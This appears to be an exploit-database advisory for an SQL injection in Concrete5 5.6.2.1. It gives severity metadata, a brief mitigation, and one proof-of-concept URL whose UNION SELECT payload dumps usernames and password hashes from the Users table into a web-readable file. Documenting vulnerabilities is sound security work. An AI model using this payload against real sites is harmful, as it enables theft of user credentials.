vendor:
Concrete5
by:
killall-9@mail.com
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Concrete5
Affected Version From: 5.6.2.1
Affected Version To: 5.6.2.1
Patch Exists: NO
Related CWE: N/A
CPE: a:concrete5:concrete5
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: Virtualbox debian
2014
Concrete5 sql injection
Concrete5 is vulnerable to SQL injection. An attacker can exploit the parameters Pages.cID in order to execute arbitrary SQL commands. An example of a proof-of-concept URL is http://localhost/concrete5.6.2.1/index.php/?arHandle=Main&bID=34&btask=passthru&ccm_token=1392630914:be0d09755f653afb162d041a33f5feae&cID=1 union select uName,uPassword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from Users into outfile '/var/www/concrete5.6.2.1/ownz.txt'&method=submit_form
Mitigation:
Input validation and sanitization should be used to prevent SQL injection attacks. Additionally, access to the database should be restricted to only those users who need it.